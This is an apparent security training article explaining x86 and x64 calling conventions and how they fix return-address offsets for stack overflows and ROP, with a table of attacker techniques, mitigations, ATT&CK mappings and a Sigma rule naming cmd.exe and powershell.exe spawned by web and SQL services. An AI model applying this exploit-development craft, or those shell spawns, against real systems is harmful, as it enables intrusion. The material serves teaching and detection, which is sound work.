  • Overflows corrupt saved RBP/EBP and the return address; /GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it.
  • Detect follow-on activity via WER dumps, Sysmon EventID 1/10, Security 4672, and ETW mitigation/call-stack events, mapped to T1203 and T1068.

x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V

Objective: Understand how the five major calling conventions — cdecl, stdcall, fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI — dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.


1. Why Calling Conventions Matter for Exploit Development

A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.

For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.


2. Stack Mechanics Refresher: PUSH, POP, CALL, RET

The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.

  • CALL target pushes the return address (the next instruction’s EIP/RIP) onto the stack, then jumps.
  • RET pops that saved address back into the instruction pointer.
  • RET N pops the address and adds N to ESP — this is how a callee cleans caller-pushed arguments.

push arg1          ; arg on stack
call foo           ; pushes return address, jumps to foo
add  esp, 4        ; caller cleans 1 dword arg (cdecl)

Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.
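
A toy model makes the ESP bookkeeping of CALL, RET, and RET N easy to follow. This is a deliberately simplified sketch: the Stack32 class, its starting ESP, and the addresses used are all hypothetical, and only the stack-pointer arithmetic is modelled.

```python
class Stack32:
    """Toy 32-bit stack: memory is a dict keyed by address, ESP moves down."""
    def __init__(self, esp=0x0012FF00):
        self.esp, self.mem = esp, {}

    def push(self, value):
        self.esp -= 4                   # PUSH decrements ESP, then writes
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]      # POP reads, then increments ESP
        self.esp += 4
        return value

    def call(self, return_address):
        self.push(return_address)       # CALL = push next EIP, then jump

    def ret(self, n=0):
        eip = self.pop()                # RET pops the saved address...
        self.esp += n                   # ...and RET N also discards N arg bytes
        return eip

s = Stack32()
start = s.esp
s.push(2)                               # two dword args, right to left
s.push(1)
s.call(0x00401005)
print(hex(s.ret(8)), s.esp == start)    # callee cleanup restores ESP
```

Replacing ret(8) with ret() leaves ESP eight bytes below its starting value, which is exactly the gap a cdecl caller closes with add esp, 8.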


3. x86 cdecl: The C Standard

__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.

Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.

; foo(1, 2, 3);  -- cdecl
push 3             ; rightmost first
push 2
push 1             ; leftmost last
call _foo
add  esp, 12       ; CALLER cleans 3 dwords

Canonical x86 stack frame once the prologue has run (high → low address):

[arg N]          ← pushed first (rightmost)
[arg 2]
[arg 1]          ← pushed last (leftmost)
[return address] ← pushed by CALL
[saved EBP]      ← pushed by prologue (PUSH EBP)
[local vars]     ← ESP after SUB ESP, N

The saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.


Figure: In cdecl, overflowing a local buffer overwrites saved EBP and then the return address in exactly this order, which makes the offset deterministic.

4. x86 stdcall: The Windows API Convention

__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.

Name decoration encodes the byte count of stack arguments: a leading underscore, an @, then the size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.

; foo(1, 2);  -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here: the callee handled it

_foo@8:
    ; ... body ...
    ret 8          ; CALLEE pops 8 bytes of args

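For shellcode and custom loaders, decoration matters when resolving imports: the name being looked up must match the export exactly. System DLLs such as user32.dll export undecorated names (MessageBoxA), while the _name@N form appears in object files and import libraries.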


5. x86 fastcall: Register-Based Argument Passing

__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.

; foo(1, 2, 3);  -- MSVC fastcall
mov  ecx, 1        ; arg1 in ECX
mov  edx, 2        ; arg2 in EDX
push 3             ; arg3 on stack
call @foo@12

⚠️ Compiler variance: __fastcall is not standardized across compilers. MSVC uses ECX/EDX. Borland passes the first three arguments in EAX, EDX, ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s __fastcall label.
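
The MSVC decoration rules for the three x86 conventions covered so far fit in a few lines. The sketch below is illustrative: decorate is a hypothetical helper covering C linkage only, and it does not attempt C++ name mangling or other compilers' schemes.

```python
def decorate(name, convention, arg_bytes=0):
    """Return the MSVC-decorated C symbol for a 32-bit function.
    arg_bytes is the total size of all arguments, register-passed included."""
    if convention == "cdecl":
        return f"_{name}"                   # leading underscore only
    if convention == "stdcall":
        return f"_{name}@{arg_bytes}"       # underscore, name, @bytes
    if convention == "fastcall":
        return f"@{name}@{arg_bytes}"       # leading @ instead of underscore
    raise ValueError(f"unknown convention: {convention}")

print(decorate("foo", "cdecl"))
print(decorate("MessageBoxA", "stdcall", 16))
print(decorate("foo", "fastcall", 12))
```

The three results correspond to the symbols used in the assembly listings of sections 3 to 5.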


6. Microsoft x64 ABI: The Modern Windows Convention

On Windows x64 there is effectively one ABI; the /Gd, /Gr, /Gz flags only exist for x86 targets. The convention is a four-register fastcall:

Argument slot | Integer register | Float register
1 | RCX | XMM0
2 | RDX | XMM1
3 | R8 | XMM2
4 | R9 | XMM3

Key rules:

  • One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
  • Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
  • Arguments beyond the first four go on the stack after the shadow space.
  • The stack must be 16-byte aligned before CALL.
  • The x87 register stack is not used for arguments or return values; floating-point values travel in the XMM registers, of which XMM0–XMM5 are volatile across calls.

Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.

; foo(a, b, c, d) -- Microsoft x64
mov  rcx, a
mov  rdx, b
mov  r8,  c
mov  r9,  d
sub  rsp, 20h      ; 32 bytes shadow space (caller's job)
call foo
add  rsp, 20h      ; reclaim shadow space

Volatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15.


Figure: The mandatory 32-byte shadow space sits between the caller's stack arguments and the saved return address, so stack arguments start 32 bytes further above the return address than in an equivalent System V frame.

7. System V AMD64 ABI: The Linux and macOS Convention

System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:

Argument slot | Integer register | Float register
1 | RDI | XMM0
2 | RSI | XMM1
3 | RDX | XMM2
4 | RCX | XMM3
5 | R8 | XMM4–XMM7 (float arguments 5–8)
6 | R9 |

Additional arguments push onto the stack in reverse order. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.

  • Callee-saved: RBX, RBP, R12–R15. All others are caller-saved.
  • Red zone: the 128 bytes below RSP are reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjusting RSP.
  • Syscall variant: kernel entry uses the same registers except R10 replaces RCX (because the syscall instruction clobbers RCX).
  • Varargs: for variadic functions, RAX must hold the number of vector (XMM) registers used, 0–8.

; write(1, buf, len) via syscall -- System V
mov  rax, 1         ; sys_write
mov  rdi, 1         ; fd (arg1)
mov  rsi, buf       ; buffer (arg2)
mov  rdx, len       ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)

⚠️ Shadow space and the red zone are platform-specific and commonly confused. Shadow space (32 bytes above the return address, allocated by the caller) exists only on Windows x64. The red zone (128 bytes below RSP) exists only on System V. Never assume both.


Figure: Red zone and shadow space are mutually exclusive per-platform features; conflating them is a classic source of cross-platform shellcode crashes.

8. Side-by-Side Comparison and ABI Detection in Disassembly

Property | Microsoft x64 | System V AMD64
Integer arg registers | RCX, RDX, R8, R9 | RDI, RSI, RDX, RCX, R8, R9
FP arg registers | XMM0–XMM3 | XMM0–XMM7
Shadow space | 32 bytes (mandatory) | None
Red zone | None | 128 bytes below RSP
Callee-saved | RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15 | RBX, RBP, R12–R15
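
One difference the table does not show is how register slots are counted: Microsoft x64 assigns registers by argument position, while System V counts integer and floating-point arguments independently. The sketch below illustrates that for scalar arguments only; it ignores structs, varargs, and by-reference passing, and the function names are hypothetical. Stack offsets are relative to RSP at callee entry.

```python
MS_INT = ["RCX", "RDX", "R8", "R9"]
SYSV_INT = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]

def assign_ms_x64(kinds):
    """kinds: list of 'int' or 'float'. Slots are positional: argument i
    takes MS_INT[i] or XMMi depending on its type."""
    out = []
    for i, kind in enumerate(kinds):
        if i < 4:
            out.append(MS_INT[i] if kind == "int" else f"XMM{i}")
        else:
            # return address at [RSP], 0x20 bytes of shadow space above it
            out.append(f"[RSP+0x{0x28 + 8 * (i - 4):X}]")
    return out

def assign_sysv(kinds):
    """Integer and SSE registers are consumed from separate counters."""
    out, n_int, n_fp, n_stack = [], 0, 0, 0
    for kind in kinds:
        if kind == "int" and n_int < 6:
            out.append(SYSV_INT[n_int])
            n_int += 1
        elif kind == "float" and n_fp < 8:
            out.append(f"XMM{n_fp}")
            n_fp += 1
        else:
            out.append(f"[RSP+0x{8 + 8 * n_stack:X}]")   # just above the return address
            n_stack += 1
    return out

sig = ["int", "float", "int", "float", "int"]
print(assign_ms_x64(sig))
print(assign_sysv(sig))
```

For this signature the fifth argument lands on the stack under the Microsoft convention but still fits in RDX under System V, which is the kind of divergence that breaks hand-ported call sequences.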

Recognition heuristics in IDA/Ghidra:

  • A sub rsp, 0x20 immediately before CALL and arguments loaded into RCX/RDX/R8/R9 ⇒ Microsoft x64.
  • Arguments loaded into RDI/RSI/RDX and writes into [rsp-8] without a prior sub rsp ⇒ System V (red zone).
  • A ret N (non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments in ECX/EDX distinguish fastcall.
  • A bare ret with caller-side add esp, N ⇒ cdecl.

Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.


9. Calling Conventions as an Attack Surface

Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.

In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.

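On Windows x64, the mandatory 32-byte shadow space sits above the saved return address, in the caller's frame. It therefore does not change the distance from a callee's local buffer to its return address; it changes what follows that address. The 32 bytes directly above the return slot are home space the callee may overwrite, and stack arguments begin at [RSP+0x28] on entry rather than [RSP+0x08] as on System V. Forgetting those 32 bytes when laying out data beyond the return address is a classic source of off-by-32 errors in cross-platform shellcode.

A conceptual offset calculator makes the dependency explicit:

def return_addr_offset(buf_size, conv, frame_pointer=True):
    # bytes from start of local buffer to the saved return address,
    # assuming the buffer is the topmost local (no canary, no padding)
    if conv in ("x86_cdecl", "x86_stdcall"):
        return buf_size + (4 if frame_pointer else 0)   # + saved EBP (4 bytes)
    if conv in ("sysv_amd64", "ms_x64"):
        # shadow space lies above the return address, so it adds nothing here
        return buf_size + (8 if frame_pointer else 0)   # + saved RBP (8 bytes)
    raise ValueError("unknown convention")

Frame-pointer presence (-fomit-frame-pointer removes saved RBP), stack canaries, and alignment padding all change the answer, while shadow space changes the layout beyond the return address. This is why convention awareness precedes any reliable payload.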


Figure: Every ROP gadget that loads a register is a direct consequence of the ABI. On System V you need pop rdi; ret for arg 1 because the convention mandates RDI, not the stack.

10. Common Attacker Techniques

Technique | Description
Saved return-address overwrite | Overflow a local buffer to clobber the convention-determined return slot
Return-to-libc (x86) | Stack-arranged args (cdecl) let an attacker call system() without shellcode
ROP register loading (x64) | Use pop rdi ; ret / pop rcx ; ret gadgets to satisfy the ABI before a call
Shadow-space-aware stack pivot | Account for the 32-byte home space when chaining Windows x64 gadgets
IAT patching via decoration | Resolve _func@N decorated stdcall imports for shellcode loaders
Reflective API calls | Manually set up RCX/RDX/R8/R9 + shadow space before invoking LoadLibraryA

Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.


11. Defensive Strategies & Detection

Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.

Compile-time mitigations motivated directly by convention layout:

  • Stack canaries: /GS (MSVC) and -fstack-protector-strong (GCC/Clang) detect return-address overwrite before RET.
  • Control Flow Guard: /guard:cf validates indirect CALL targets.
  • Intel CET / Shadow Stack — hardware enforces that RET pops the address CALL pushed, directly countering return-address overwrites. Mark binaries with IMAGE_DLLCHARACTERISTICS_GUARD_CET_COMPAT (0x4000).
  • ASLR + PIE — randomizes addresses so known layout still yields unknown absolute targets.
  • -mno-red-zone — hardens Linux kernel modules against red-zone clobbering.

Runtime telemetry for the exploitation aftermath:

  • Sysmon Event ID 1 (Process Create) — anomalous children of network-facing services after a successful ROP/return-to-libc chain.
  • Sysmon Event ID 10 (Process Access): cross-process handle opens with memory-write rights, the step that precedes VirtualAllocEx/WriteProcessMemory from convention-correct injected shellcode.
  • Sysmon Event ID 7 (Image Load) — unexpected DLL loads from a corrupted return address redirecting into LoadLibrary.
  • Microsoft-Windows-Threat-Intelligence ETW — kernel telemetry on NtAllocateVirtualMemory / NtWriteVirtualMemory.
  • Audit Process Creation (Event 4688) with command-line logging.

title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\w3wp.exe'
      - '\sqlservr.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  condition: selection
level: high

12. Tools for Calling-Convention Analysis

Tool | Description | Link
IDA Pro / Ghidra | Decompiler ABI inference and stack-frame reconstruction | ghidra-sre.org
x64dbg | Live register/stack inspection on Windows | x64dbg.com
GDB + pwndbg | Stack and register view on Linux (x/16gx $rsp) | gnu.org
WinDbg | Inspect shadow space and frame layout (dd rsp) | microsoft.com
Godbolt Compiler Explorer | Compare emitted asm across conventions/compilers | godbolt.org
ROPgadget / Ropper | Enumerate pop rdi ; ret-style register-loading gadgets | github.com
NASM | Hand-assemble convention test cases | nasm.us
Radare2 | Cross-platform disassembly and ABI heuristics | rada.re

13. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Exploitation for Client Execution | T1203 | Crash telemetry, Event 4688 child-process anomalies
Exploit Public-Facing Application | T1190 | WAF/IDS, anomalous service children (Event ID 1)
Process Injection | T1055 | Sysmon Event ID 10 (VirtualAllocEx/WriteProcessMemory)
Process Injection: DLL Injection | T1055.001 | Event ID 7 unexpected LoadLibraryA loads
Command and Scripting Interpreter | T1059 | Event ID 1 cmd.exe/powershell.exe spawns
Reflective Code Loading | T1620 | ETW Threat-Intelligence memory-write telemetry

ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.


Summary

  • Calling conventions are the binary-level contract that makes stack layout deterministic — and therefore exploitable.
  • x86 splits into cdecl (caller cleanup, variadics, _foo), stdcall (callee RET N, _foo@N), and fastcall (ECX/EDX, MSVC-specific vs. Borland’s EAX/EDX/ECX).
  • The two 64-bit ABIs differ in argument registers (RCX,RDX,R8,R9 vs. RDI,RSI,RDX,RCX,R8,R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets.
  • Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required — pop rdi ; ret on Linux, shadow-space accounting on Windows.
  • Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event 4688, hardened with canaries, CFG, and CET shadow stacks.
